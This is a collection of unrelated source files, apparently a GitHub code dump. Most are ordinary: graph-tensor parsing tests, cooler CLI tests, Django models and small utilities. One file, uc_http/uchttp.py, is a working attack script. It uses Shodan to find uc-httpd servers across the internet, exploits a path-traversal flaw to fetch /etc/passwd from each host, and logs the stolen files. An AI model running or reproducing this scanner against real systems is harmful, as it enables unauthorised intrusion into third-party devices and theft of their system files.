NodeInputBP(label='format', dtype=dtypes.Data(default='%a %b %d %H:%M:%S %Y', size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime._strptime_time(self.input(0), self.input(1)))
class Re_Compile_Node(NodeBase):
"""
Compile a regular expression pattern, returning a Pattern object."""
title = 're_compile'
type_ = '_strptime'
init_inputs = [
NodeInputBP(label='pattern'),
NodeInputBP(label='flags', dtype=dtypes.Data(default=0, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime.re_compile(self.input(0), self.input(1)))
class Re_Escape_Node(NodeBase):
"""
Escape special characters in a string.
"""
title = 're_escape'
type_ = '_strptime'
init_inputs = [
NodeInputBP(label='pattern'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime.re_escape(self.input(0)))
export_nodes(
_Calc_Julian_From_U_Or_W_Node,
_Calc_Julian_From_V_Node,
_Getlang_Node,
_Strptime_Node,
_Strptime_Datetime_Node,
_Strptime_Time_Node,
Re_Compile_Node,
Re_Escape_Node,
)
|
eventsourcing/examples/aggregate8/test_snapshotting_intervals.py | ParikhKadam/eventsourcing | 107 | 12717120 | from unittest import TestCase
from eventsourcing.examples.aggregate8.application import DogSchool
from eventsourcing.examples.aggregate8.domainmodel import Dog
class SubDogSchool(DogSchool):
snapshotting_intervals = {Dog: 1}
class TestDogSchool(TestCase):
def test_dog_school(self) -> None:
# Construct application object.
school = SubDogSchool()
# Evolve application state.
dog_id = school.register_dog("Fido")
assert school.snapshots is not None
self.assertEqual(1, len(list(school.snapshots.get(dog_id))))
school.add_trick(dog_id, "roll over")
self.assertEqual(2, len(list(school.snapshots.get(dog_id))))
school.add_trick(dog_id, "play dead")
self.assertEqual(3, len(list(school.snapshots.get(dog_id))))
# Query application state.
dog = school.get_dog(dog_id)
assert dog["name"] == "Fido"
assert dog["tricks"] == ("roll over", "play dead")
|
winapi__windows__ctypes/winapi__get_usb_list.py | DazEB2/SimplePyScripts | 117 | 12717197 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
def locate_usb() -> list:
import win32file
from winapi__get_logical_drives import get_logical_drives
usb_list = list()
for drive_name in get_logical_drives():
drive_type = win32file.GetDriveType(drive_name)
if drive_type == win32file.DRIVE_REMOVABLE:
usb_list.append(drive_name)
return usb_list
if __name__ == '__main__':
print(locate_usb())
|
torchlambda/_version.py | medric49/torchlambda | 104 | 12717242 | __version__ = "NON-CI"
|
tests/test_migrate/models.py | agilentia/django-salesforce | 251 | 12717246 | <gh_stars>100-1000
"""Backward compatible behaviour with primary key 'Id' and upper-case field names"""
from salesforce import models
from salesforce.models import SalesforceModel
class User(SalesforceModel):
username = models.CharField(max_length=80)
email = models.CharField(max_length=100)
last_name = models.CharField(max_length=80)
first_name = models.CharField(max_length=40, null=True, blank=True)
is_active = models.BooleanField(default=False)
class Lead(SalesforceModel):
company = models.CharField(max_length=255)
last_name = models.CharField(max_length=80)
class Meta:
db_table = 'Lead'
class Contact(SalesforceModel):
last_name = models.CharField(max_length=80)
owner = models.ForeignKey(User, on_delete=models.DO_NOTHING, default=models.DefaultedOnCreate(User))
class Meta:
managed = True
db_table = 'Contact'
|
tests/__main__.py | otherJL0/Preql | 522 | 12717247 | <gh_stars>100-1000
import sys
import unittest
import logging
logging.basicConfig(level=logging.INFO)
from .test_basic import *
from .test_autocomplete import AutocompleteTests
minimal = [
AutocompleteTests,
TestTypes,
TestFlow,
TestFunctions,
BasicTests_0_Normal_Lt,
]
TESTS_SUITES = {
'minimal': minimal
}
def run_test_suite(suit):
tests = TESTS_SUITES[suit]
suite = unittest.TestSuite()
for t in tests:
suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(t))
unittest.TextTestRunner().run(suite)
if __name__ == '__main__':
try:
tests = run_test_suite(sys.argv[1])
except LookupError:
unittest.main() |
tensorflow_gnn/graph/graph_tensor_io_test.py | mattdangerw/gnn | 611 | 12717248 | """Tests for gt.GraphTensor extension type (go/tf-gnn-api)."""
import functools
from typing import Any, Callable, Iterable, List, Mapping, Optional
from absl.testing import parameterized
import google.protobuf.text_format as pbtext
import tensorflow as tf
from tensorflow_gnn.graph import adjacency as adj
from tensorflow_gnn.graph import graph_constants as gc
from tensorflow_gnn.graph import graph_tensor as gt
from tensorflow_gnn.graph import graph_tensor_io as io
from tensorflow_gnn.graph import schema_utils as su
import tensorflow_gnn.proto.graph_schema_pb2 as schema_pb2
ResultValue = Mapping[str, Any]
ResultFn = Callable[[gt.GraphTensor], ResultValue]
as_tensor = tf.convert_to_tensor
as_ragged = tf.ragged.constant
class TfExampleParsingTestBase(tf.test.TestCase, parameterized.TestCase):
def pbtxt_to_dataset(self, examples_pbtxt: List[str]) -> tf.data.Dataset:
serialized = []
for example_pbtxt in examples_pbtxt:
serialized.append(
pbtext.Merge(example_pbtxt, tf.train.Example()).SerializeToString())
return tf.data.Dataset.from_tensor_slices(serialized)
def assertFieldsEqual(self, expected: gt.Fields, actual: gt.Fields):
self.assertAllEqual(expected.keys(), expected.keys())
for k in expected.keys():
self.assertAllEqual(expected[k], actual[k], msg=f'field={k}')
def assertFieldsSeqEqual(self, expected: Iterable[gt.Fields],
actual: Iterable[gt.Fields]):
expected = list(expected)
actual = list(actual)
self.assertEqual(len(expected), len(actual))
for e, a in zip(expected, actual):
self.assertFieldsEqual(e, a)
class TfExampleParsingFromSpecTest(TfExampleParsingTestBase):
"""Tests for TF Example to Graph Tensor parsing from the GraphTensorSpec."""
@parameterized.parameters([
dict(
description='context dense features parsing',
spec=gt.GraphTensorSpec.from_piece_specs(
context_spec=gt.ContextSpec.from_field_specs(features_spec={
'v': tf.TensorSpec(shape=(2,), dtype=tf.int16),
'm': tf.TensorSpec(shape=(2, 3), dtype=tf.int32),
't': tf.TensorSpec(shape=(1, 1, 2), dtype=tf.int64),
})),
examples=[
r"""
features {
feature {key: "context/v" value {int64_list {value: [1, 2]} } }
feature {key: "context/m" value {int64_list {value: [1, 2, 3, 4, 5, 6]} } }
feature {key: "context/t" value {int64_list {value: [1, 2] } } }
}""", r"""
features {
feature {key: "context/v" value {int64_list {value: [9, 8]} } }
feature {key: "context/m" value {int64_list {value: [9, 8, 7, 6, 5, 4]} } }
feature {key: "context/t" value {int64_list {value: [9, 8]} } }
}"""
],
expected_values=[{
'context/v': as_tensor([1, 2]),
'context/m': as_tensor([[1, 2, 3], [4, 5, 6]]),
'context/t': as_tensor([[[1, 2]]])
}, {
'context/v': as_tensor([9, 8]),
'context/m': as_tensor([[9, 8, 7], [6, 5, 4]]),
'context/t': as_tensor([[[9, 8]]])
}]),
dict(
description='context ragged features parsing',
spec=gt.GraphTensorSpec.from_piece_specs(
context_spec=gt.ContextSpec.from_field_specs(features_spec={
'xyz':
tf.RaggedTensorSpec(
shape=(None, None, 3),
ragged_rank=1,
row_splits_dtype=tf.int32,
dtype=tf.float32)
})),
examples=[
r"""
features {
feature {
key: "context/xyz"
value {
float_list {value: [-1., 0., 1., 1., 0., -1., 2., 2., 2.]}
}
}
feature {
key: "context/xyz.d1"
value {
int64_list {value: [0, 2, 0, 1]}
}
}
}"""
],
expected_values=[{
'context/xyz':
as_ragged([[], [[-1., 0., 1.], [1., 0., -1.]], [],
[[2., 2., 2.]]],
ragged_rank=1)
}]),
dict(
description='node/edge features parsing',
spec=gt.GraphTensorSpec.from_piece_specs(
node_sets_spec={
'node':
gt.NodeSetSpec.from_field_specs(
features_spec={
'text':
tf.RaggedTensorSpec(
shape=(None, None, None),
ragged_rank=2,
row_splits_dtype=tf.int32,
dtype=tf.string),
},
sizes_spec=tf.TensorSpec(
shape=(None,), dtype=tf.int32)),
},
edge_sets_spec={
'edge':
gt.EdgeSetSpec.from_field_specs(
features_spec={
'weight':
tf.TensorSpec(
shape=(None,), dtype=tf.float32),
},
sizes_spec=tf.TensorSpec(
shape=(None,), dtype=tf.int32),
adjacency_spec=(
adj.AdjacencySpec.from_incident_node_sets(
source_node_set='node',
target_node_set='node',
index_spec=tf.TensorSpec(
shape=(None,), dtype=tf.int32)))),
}),
examples=[
r"""
features {
feature {key: "nodes/node.#size" value {int64_list {value: [1, 2]} } }
feature {key: "nodes/node.text" value {bytes_list {value: ['a', 'b', 'c', 'd', 'e']} } }
feature {key: "nodes/node.text.d1" value {int64_list {value: [2, 0, 1]} } }
feature {key: "nodes/node.text.d2" value {int64_list {value: [2, 1, 2]} } }
feature {key: "edges/edge.#size" value {int64_list {value: [2, 3]} } }
feature {key: "edges/edge.#source" value {int64_list {value: [0, 1, 2, 2, 2]} } }
feature {key: "edges/edge.#target" value {int64_list {value: [2, 1, 0, 0, 0]} } }
feature {key: "edges/edge.weight" value {float_list {value: [1., 2., 3., 4., 5.]} } }
}"""
],
expected_values=[{
'node/#size': [1, 2],
'node/text':
as_ragged([[[b'a', b'b'], [b'c']], [], [[b'd', b'e']]],
ragged_rank=2,
dtype=tf.string,
row_splits_dtype=tf.int32),
'edge/#size':
as_tensor([2, 3]),
'edge/#source':
as_tensor([0, 1, 2, 2, 2]),
'edge/#target':
as_tensor([2, 1, 0, 0, 0]),
'edge/weight':
as_tensor([1., 2., 3., 4., 5.])
}])
])
def testSingleExampleParsing(
self,
description: str,
spec: gt.GraphTensorSpec,
examples: List[str],
expected_values: List[gc.Fields],
):
ds = self.pbtxt_to_dataset(examples)
ds = ds.map(functools.partial(io.parse_single_example, spec))
self.assertAllEqual(ds.element_spec, spec)
ds = ds.map(_flatten_homogeneous_graph)
self.assertFieldsSeqEqual(expected_values, ds)
case1 = dict(
description='context dense features parsing',
drop_remainder=True,
spec=gt.GraphTensorSpec.from_piece_specs(
context_spec=gt.ContextSpec.from_field_specs(features_spec={
'v': tf.TensorSpec(shape=(2,), dtype=tf.int16),
'm': tf.TensorSpec(shape=(2, 3), dtype=tf.int32),
't': tf.TensorSpec(shape=(1, 1, 2), dtype=tf.int64),
})),
examples=[
r"""
features {
feature {key: "context/v" value {int64_list {value: [1, 2]} } }
feature {key: "context/m" value {int64_list {value: [1, 2, 3, 4, 5, 6]} } }
feature {key: "context/t" value {int64_list {value: [1, 2] } } }
}""", r"""
features {
feature {key: "context/v" value {int64_list {value: [9, 8]} } }
feature {key: "context/m" value {int64_list {value: [9, 8, 7, 6, 5, 4]} } }
feature {key: "context/t" value {int64_list {value: [9, 8]} } }
}"""
],
expected={
'context/v': as_tensor([[1, 2], [9, 8]]),
'context/m': as_tensor([[[1, 2, 3], [4, 5, 6]],
[[9, 8, 7], [6, 5, 4]]]),
'context/t': as_tensor([[[[1, 2]]], [[[9, 8]]]])
},
prefix=None,
validate=True)
case2 = dict(
description='ragged features parsing',
drop_remainder=False,
spec=gt.GraphTensorSpec.from_piece_specs(
node_sets_spec={
'node':
gt.NodeSetSpec.from_field_specs(
features_spec={
'words':
tf.RaggedTensorSpec(
shape=(None, None),
ragged_rank=1,
row_splits_dtype=tf.int32,
dtype=tf.string),
},
sizes_spec=tf.TensorSpec(shape=(1,), dtype=tf.int32)),
},
edge_sets_spec={
'edge':
gt.EdgeSetSpec.from_field_specs(
features_spec={
'weight':
tf.TensorSpec(
shape=(None,), dtype=tf.float32),
},
sizes_spec=tf.TensorSpec(shape=(1,), dtype=tf.int32),
adjacency_spec=(
adj.AdjacencySpec.from_incident_node_sets(
source_node_set='node',
target_node_set='node',
index_spec=tf.TensorSpec(
shape=(None,), dtype=tf.int32)))),
}),
examples=[
r"""
features {
feature {key: "nodes/node.#size" value {int64_list {value: [3]} } }
feature {key: "nodes/node.words" value {bytes_list {value: ['a', 'b', 'c']} } }
feature {key: "nodes/node.words.d1" value {int64_list {value: [2, 0, 1]} } }
feature {key: "edges/edge.#size" value {int64_list {value: [5]} } }
feature {key: "edges/edge.#source" value {int64_list {value: [0, 1, 2, 2, 2]} } }
feature {key: "edges/edge.#target" value {int64_list {value: [2, 1, 0, 0, 0]} } }
feature {key: "edges/edge.weight" value {float_list {value: [1., 2., 3., 4., 5.]} } }
}""", r"""
features {
feature {key: "nodes/node.#size" value {int64_list {value: [1]} } }
feature {key: "nodes/node.words" value {bytes_list {value: ['e', 'f']} } }
feature {key: "nodes/node.words.d1" value {int64_list {value: [2]} } }
}"""
],
expected={
'node/#size': as_tensor([[3], [1]]),
'node/words': as_ragged([[[b'a', b'b'], [], [b'c']], [[b'e', b'f']]],
ragged_rank=2,
dtype=tf.string,
row_splits_dtype=tf.int32),
'edge/#size': as_tensor([[5], [0]]),
'edge/#source': as_ragged([[0, 1, 2, 2, 2], []]),
'edge/#target': as_ragged([[2, 1, 0, 0, 0], []]),
'edge/weight': as_ragged([[1., 2., 3., 4., 5.], []])
},
prefix=None,
validate=True)
# pylint: disable=g-long-lambda
case3 = dict(
description='variable number of graph components',
drop_remainder=False,
spec=gt.GraphTensorSpec.from_piece_specs(
context_spec=gt.ContextSpec.from_field_specs(
features_spec={
'label': tf.TensorSpec(shape=(None,), dtype=tf.string)}),
node_sets_spec={
'node':
gt.NodeSetSpec.from_field_specs(
features_spec={
'words': tf.RaggedTensorSpec(
shape=(None, None),
ragged_rank=1,
row_splits_dtype=tf.int32,
dtype=tf.string),
},
sizes_spec=tf.TensorSpec(
shape=(None,), dtype=tf.int32)),
},
edge_sets_spec={
'edge':
gt.EdgeSetSpec.from_field_specs(
features_spec={'weight': tf.TensorSpec(
shape=(None,), dtype=tf.float32)},
sizes_spec=tf.TensorSpec(
shape=(None,), dtype=tf.int32),
adjacency_spec=adj.AdjacencySpec.from_incident_node_sets(
source_node_set='node',
target_node_set='node',
index_spec=tf.TensorSpec(
shape=(None,), dtype=tf.int32))),
}),
examples=[
r"""
features {
feature {key: "context/label" value {bytes_list {value: ['G', 'B']} } }
feature {key: "nodes/node.#size" value {int64_list {value: [1, 2]} } }
feature {key: "nodes/node.words" value {bytes_list {value: ['a', 'b', 'c']} } }
feature {key: "nodes/node.words.d1" value {int64_list {value: [2, 0, 1]} } }
feature {key: "edges/edge.#size" value {int64_list {value: [2, 3]} } }
feature {key: "edges/edge.#source" value {int64_list {value: [0, 1, 2, 2, 2]} } }
feature {key: "edges/edge.#target" value {int64_list {value: [2, 1, 0, 0, 0]} } }
feature {key: "edges/edge.weight" value {float_list {value: [1., 2., 3., 4., 5.]} } }
}""", r"""
features {
feature {key: "context/label" value {bytes_list {value: ['B']} } }
feature {key: "nodes/node.#size" value {int64_list {value: [1]} } }
feature {key: "nodes/node.words" value {bytes_list {value: ['e', 'f']} } }
feature {key: "nodes/node.words.d1" value {int64_list {value: [2]} } }
feature {key: "edges/edge.#size" value {int64_list {value: [0]} } }
}"""
],
expected={
'context/label': as_ragged([[b'G', b'B'], [b'B']]),
'node/#size': as_ragged([[1, 2], [1]]),
'node/words': as_ragged([[[b'a', b'b'], [], [b'c']], [[b'e', b'f']]],
ragged_rank=2,
dtype=tf.string,
row_splits_dtype=tf.int32),
'edge/#size': as_ragged([[2, 3], [0]]),
'edge/#source': as_ragged([[0, 1, 2, 2, 2], []]),
'edge/#target': as_ragged([[2, 1, 0, 0, 0], []]),
'edge/weight': as_ragged([[1., 2., 3., 4., 5.], []])
},
prefix=None,
validate=True)
case4 = case3.copy()
case4['prefix'] = 'gnn_'
case4['validate'] = False
@parameterized.parameters([case1, case2, case3])
def testExamplesParsing(
self,
description: str,
spec: gt.GraphTensorSpec,
drop_remainder: bool,
examples: List[str],
expected: gc.Fields,
prefix: Optional[str],
validate: bool,
):
batch_size = len(examples)
ds = self.pbtxt_to_dataset(examples)
ds = ds.batch(batch_size, drop_remainder=drop_remainder)
ds = ds.map(functools.partial(io.parse_example, spec,
prefix=prefix, validate=validate))
self.assertAllEqual(ds.element_spec,
spec._batch(batch_size if drop_remainder else None))
ds = ds.map(_flatten_homogeneous_graph)
self.assertFieldsSeqEqual([expected], ds)
class TfExampleParsingFromSchemaTest(TfExampleParsingTestBase):
"""Tests for TF Example to Graph Tensor parsing from the GraphSchema."""
def _test_impl(self, schema_pb: schema_pb2.GraphSchema, examples: List[str],
expected_value: ResultValue, result_map_fn: ResultFn, *,
batch_then_parse: bool, drop_remainder: bool):
assert isinstance(schema_pb, schema_pb2.GraphSchema)
graph_spec = su.create_graph_spec_from_schema_pb(schema_pb)
batch_size = len(examples)
ds = self.pbtxt_to_dataset(examples)
if batch_then_parse:
ds = ds.batch(batch_size, drop_remainder=drop_remainder)
ds = ds.map(functools.partial(io.parse_example, graph_spec))
else:
ds = ds.map(functools.partial(io.parse_single_example, graph_spec))
ds = ds.batch(batch_size, drop_remainder=drop_remainder)
ds = ds.map(result_map_fn)
result_value = next(iter(ds))
self.assertFieldsEqual(result_value, expected_value)
def _test_all_cases(self, schema_pb: schema_pb2.GraphSchema,
examples: List[str], expected_value: ResultValue,
result_map_fn):
test_case = functools.partial(self._test_impl, schema_pb, examples,
expected_value, result_map_fn)
test_case(batch_then_parse=True, drop_remainder=True)
test_case(batch_then_parse=True, drop_remainder=False)
test_case(batch_then_parse=False, drop_remainder=True)
test_case(batch_then_parse=False, drop_remainder=False)
@parameterized.parameters([
dict(
description='context dense features parsing',
schema_pbtxt=r"""
context {
features {
key: "s"
value: {
dtype: DT_INT16
}
}
features {
key: "v"
value: {
dtype: DT_INT32
shape: { dim { size: 2 } }
}
}
features {
key: "m"
value: {
dtype: DT_INT32
shape: { dim { size: 2 }, dim { size: 3 } }
}
}
features {
key: "t"
value: {
dtype: DT_INT64
shape: { dim { size: 1 }, dim { size: 1 }, dim { size: 2 } }
}
}
features {
key: "r"
value: {
dtype: DT_UINT32
shape: { dim { size: -1 } dim { size: -1 } }
}
}
}""",
examples=[
r"""
features {
feature {key: "context/s" value {int64_list {value: [1]} } }
feature {key: "context/v" value {int64_list {value: [1, 2]} } }
feature {key: "context/m" value {int64_list {value: [1, 2, 3, 4, 5, 6]} } }
feature {key: "context/t" value {int64_list {value: [1, 2] } } }
feature {key: "context/r" value {int64_list {value: [1, 2, 3] } } }
feature {key: "context/r.d1" value {int64_list {value: [2] } } }
feature {key: "context/r.d2" value {int64_list {value: [1, 2] } } }
}""", r"""
features {
feature {key: "context/s" value {int64_list {value: [9]} } }
feature {key: "context/v" value {int64_list {value: [9, 8]} } }
feature {key: "context/m" value {int64_list {value: [9, 8, 7, 6, 5, 4]} } }
feature {key: "context/t" value {int64_list {value: [9, 8]} } }
feature {key: "context/r.d1" value {int64_list {value: [0] } } }
}"""
],
expected_value={
's':
as_tensor([[1], [9]]),
'v':
as_tensor([[[1, 2]], [[9, 8]]]),
'm':
as_tensor([[[[1, 2, 3], [4, 5, 6]]], [[[9, 8, 7], [6, 5,
4]]]]),
't':
as_tensor([[[[[1, 2]]]], [[[[9, 8]]]]]),
'r':
as_ragged([[[[1], [2, 3]]], [[]]],
ragged_rank=3,
row_splits_dtype=tf.int32)
})
])
def testContextParsing(self, description: str, schema_pbtxt: str,
examples: List[str], expected_value: ResultValue):
schema_pb = pbtext.Merge(schema_pbtxt, schema_pb2.GraphSchema())
@tf.function
def result_map_fn(g: gt.GraphTensor):
return g.context.get_features_dict()
self._test_all_cases(schema_pb, examples, expected_value, result_map_fn)
@parameterized.parameters([
dict(
description='context dense features parsing',
schema_pbtxt=r"""
node_sets {
key: "node"
value {
features {
key: "id"
value { dtype: DT_STRING }
}
}
value {
features {
key: "fv"
value {
dtype: DT_FLOAT
shape: { dim { size: 3 } }
}
}
}
value {
features {
key: "sr"
value {
dtype: DT_STRING
shape: { dim { size: -1 } }
}
}
}
}
""",
examples=[
r"""
features {
feature {key: "nodes/node.#size" value {int64_list {value: [1] } } }
feature {key: "nodes/node.id" value {bytes_list {value: ['node.1.1'] } } }
feature {key: "nodes/node.fv" value {float_list {value: [1., 2., 3.] } } }
feature {key: "nodes/node.sr.d1" value {int64_list {value: [0]} } }
}""", r"""
features {
}""", r"""
features {
feature {key: "nodes/node.#size" value {int64_list {value: [2] } } }
feature {key: "nodes/node.id" value {bytes_list {value: ['node.3.1', 'node.3.2'] } } }
feature {key: "nodes/node.fv" value {float_list {value: [4., 5., 6., 7., 8., 9.] } } }
feature {key: "nodes/node.sr" value {bytes_list {value: ['a', 'b', 'c']} } }
feature {key: "nodes/node.sr.d1" value {int64_list {value: [1, 2]} } }
}"""
],
expected_value={
'id':
as_ragged([['node.1.1'], [], ['node.3.1', 'node.3.2']]),
'fv':
as_ragged([[[1., 2., 3.]], [], [[4., 5., 6.], [7., 8., 9.]]],
ragged_rank=1,
row_splits_dtype=tf.int32),
'sr':
as_ragged([[[]], [], [['a'], ['b', 'c']]],
ragged_rank=2,
row_splits_dtype=tf.int32),
'#size':
as_tensor([[1], [0], [2]]),
})
])
def testNodeSetParsing(self, description: str, schema_pbtxt: str,
examples: List[str], expected_value: ResultValue):
schema_pb = pbtext.Merge(schema_pbtxt, schema_pb2.GraphSchema())
@tf.function
def result_map_fn(g: gt.GraphTensor):
node = g.node_sets['node']
features = node.get_features_dict()
features.update({'#size': node.sizes})
return features
self._test_all_cases(schema_pb, examples, expected_value, result_map_fn)
@parameterized.parameters([
dict(
description='context dense features parsing',
schema_pbtxt=r"""
edge_sets {
key: "edge"
value {
features {
key: "id"
value { dtype: DT_STRING }
}
source: 'node.a'
target: 'node.b'
}
}
""",
examples=[
r"""
features {
}""", r"""
features {
feature {key: "edges/edge.#size" value {int64_list {value: [1] } } }
feature {key: "edges/edge.#source" value {int64_list {value: [0] } } }
feature {key: "edges/edge.#target" value {int64_list {value: [0] } } }
feature {key: "edges/edge.id" value {bytes_list {value: ['e.2.1'] } } }
}""", r"""
features {
feature {key: "edges/edge.#size" value {int64_list {value: [2] } } }
feature {key: "edges/edge.#source" value {int64_list {value: [0, 1] } } }
feature {key: "edges/edge.#target" value {int64_list {value: [1, 0] } } }
feature {key: "edges/edge.id" value {bytes_list {value: ['e.3.1', 'e.3.2'] } } }
}"""
],
expected_value={
'id':
as_ragged([[], ['e.2.1'], ['e.3.1', 'e.3.2']]),
f'#adj:{gc.SOURCE}:node.a':
as_ragged([[], [0], [0, 1]], row_splits_dtype=tf.int32),
f'#adj:{gc.TARGET}:node.b':
as_ragged([[], [0], [1, 0]], row_splits_dtype=tf.int32),
'#size':
as_tensor([[0], [1], [2]]),
})
])
def testEdgeSetParsing(self, description: str, schema_pbtxt: str,
examples: List[str], expected_value: ResultValue):
schema_pb = pbtext.Merge(schema_pbtxt, schema_pb2.GraphSchema())
@tf.function
def result_map_fn(g: gt.GraphTensor):
edge = g.edge_sets['edge']
features = edge.get_features_dict()
features.update({'#size': edge.sizes})
features.update({
f'#adj:{tag}:{name}': index
for tag, (name, index) in edge.adjacency.get_indices_dict().items()
})
return features
self._test_all_cases(schema_pb, examples, expected_value, result_map_fn)
def _flatten_homogeneous_graph(graph: gt.GraphTensor) -> gc.Fields:
result = {}
for name, value in graph.context.features.items():
result[f'context/{name}'] = value
if graph.node_sets:
node_set = graph.node_sets['node']
for name, value in node_set.features.items():
result[f'node/{name}'] = value
result['node/#size'] = node_set.sizes
if graph.edge_sets:
edge_set = graph.edge_sets['edge']
for name, value in edge_set.features.items():
result[f'edge/{name}'] = value
result['edge/#size'] = edge_set.sizes
result['edge/#source'] = edge_set.adjacency[gc.SOURCE]
result['edge/#target'] = edge_set.adjacency[gc.TARGET]
return result
if __name__ == '__main__':
tf.test.main()
|
datamol/scaffold/__init__.py | hengwei-chan/fragmentation_and_assemble | 130 | 12717256 | <gh_stars>100-1000
from ._fuzzy import trim_side_chain
from ._fuzzy import fuzzy_scaffolding
|
examples/belief_mdp_example.py | david-abel/mdps | 230 | 12717274 | <reponame>david-abel/mdps
# Other imports.
from simple_rl.tasks.maze_1d.Maze1DPOMDPClass import Maze1DPOMDP
from simple_rl.pomdp.BeliefMDPClass import BeliefMDP
from simple_rl.planning.BeliefSparseSamplingClass import BeliefSparseSampling
def main():
pomdp = Maze1DPOMDP()
belief_mdp = BeliefMDP(pomdp)
bss = BeliefSparseSampling(gen_model=belief_mdp, gamma=0.6, tol=1.0, max_reward=1.0, state=belief_mdp.get_init_state())
scores, policies = bss.run(verbose=True)
if __name__ == "__main__":
main()
|
uc_http/uchttp.py | phiberoptick/My-Shodan-Scripts | 845 | 12717279 | #!/usr/bin/env python
#
# uc-http.py
# Search SHODAN for uc-http path traversial.
#
# Author: random_robbie
import shodan
import json
import requests
import sys
# Configuration
API_KEY = "YOURSHODANAPIKEY"
SEARCH_FOR = 'Server: uc-httpd 1.0.0'
session = requests.Session()
def grab_file (IP,PORT):
try:
print ("[*] Testing: "+IP+" on Port: "+PORT+" [*]")
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Content-Type":"application/x-www-form-urlencoded"}
response = session.get("http://"+IP+":"+PORT+"/../../../../../../etc/passwd%00", headers=headers, timeout=15)
if 'root:' in response.text:
print ("[*]Got Password File ... Logging to file.[*]")
text_file = open("./found/"+IP+"passwd.txt", "a")
text_file.write(""+response.text+"\n")
text_file.close()
if '404 File Not Found' in response.text:
print ("[*] Not Vunerable. [*]")
except requests.exceptions.Timeout:
print ("[*] "+IP+" Timeout unable to connect [*]")
except Exception as e:
print('Error: %s' % e)
try:
# Setup the api
api = shodan.Shodan(API_KEY)
# Perform the search
result = api.search(SEARCH_FOR)
# Loop through the matches and print each IP
for service in result['matches']:
IP = str(service['ip_str'])
PORT = str(service['port'])
grab_file (IP,PORT)
except Exception as e:
print('Error: %s' % e)
sys.exit(1) |
src/towncrier/__main__.py | hawkowl/towncrier | 252 | 12717313 | <gh_stars>100-1000
from towncrier._shell import cli
cli()
|
tests/proj3/proj3/__init__.py | maphew/nimporter | 656 | 12717319 | from proj3.proj3 import foo, bar, baz
import proj3.lib3
|
tests/test_cli_fileops.py | mimakaev/cooler | 106 | 12717325 | from __future__ import absolute_import, division
import os.path as op
from click.testing import CliRunner
from cooler.cli import cli
testdir = op.realpath(op.dirname(__file__))
datadir = op.join(testdir, "data")
def test_cp():
runner = CliRunner()
with runner.isolated_filesystem():
result = runner.invoke(
cli,
[
"cp",
op.join(datadir, "toy.symm.upper.2.cool"),
'test.cool',
]
)
assert result.exit_code == 0
result = runner.invoke(
cli,
[
"mv",
'test.cool',
'test2.cool::some/path',
]
)
assert result.exit_code == 0
result = runner.invoke(
cli,
[
"ln",
'test2.cool::some/path',
'test2.cool::hard/link',
]
)
assert result.exit_code == 0
result = runner.invoke(
cli,
[
"ln", "-s",
'test2.cool::some/path',
'test2.cool::soft/link',
]
)
assert result.exit_code == 0
result = runner.invoke(
cli,
[
"ln", "-s",
'test2.cool::some/path',
'test3.cool::ext/link',
]
)
assert result.exit_code == 0
def test_list_coolers():
runner = CliRunner()
result = runner.invoke(
cli,
[
"ls",
op.join(datadir, "toy.symm.upper.2.cool"),
]
)
assert result.exit_code == 0
result = runner.invoke(
cli,
[
"ls", "-l",
op.join(datadir, "toy.symm.upper.2.cool"),
]
)
assert result.exit_code == 0
def test_tree():
runner = CliRunner()
result = runner.invoke(
cli,
[
"tree",
op.join(datadir, "toy.symm.upper.2.cool"),
]
)
assert result.exit_code == 0
def test_attrs():
runner = CliRunner()
result = runner.invoke(
cli,
[
"attrs",
op.join(datadir, "toy.symm.upper.2.cool"),
]
)
assert result.exit_code == 0
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.